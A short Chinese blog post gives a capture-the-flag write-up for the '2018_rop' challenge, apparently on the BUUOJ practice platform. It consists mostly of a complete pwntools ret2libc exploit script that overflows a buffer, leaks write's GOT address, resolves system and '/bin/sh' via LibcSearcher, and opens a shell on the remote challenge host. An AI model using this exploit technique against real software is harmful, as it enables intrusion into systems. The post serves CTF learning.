铁人三项(第五赛区)_2018_rop

exp 脚本

  先 rop 用 write 泄露 got 表地址,计算 system 和 /bin/sh 的偏移,回到漏洞函数再次 rop 调用 system('/bin/sh')

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'
io = remote('node3.buuoj.cn',28574)

elf = ELF('./2018_rop')

write_got = elf.got['write']
write_plt = elf.plt['write']
read_plt = elf.plt['read']

payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt)
payload += p32(0x80484c6)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

io.sendline(payload)
write_addr = io.recv()
print hex(u32(write_addr))
#libcbase = u32(write_addr) - libc.symbols['write']
#system = libcbase + libc.symbols['system']
#binsh = libcbase + libc.search('/bin/sh').next()

obj = LibcSearcher('write',u32(write_addr))
libcbase = u32(write_addr) - obj.dump('write')
system = libcbase + obj.dump('system')
binsh = libcbase + obj.dump("str_bin_sh")

payload = 'a' * (0x88 + 4)
payload += p32(system)
payload += p32(0)
payload += p32(binsh)

sleep(0.5)
io.sendline(payload)

io.interactive()

posted @ 2020-02-29 00:09  PwnKi  阅读(1054)  评论(0编辑  收藏  举报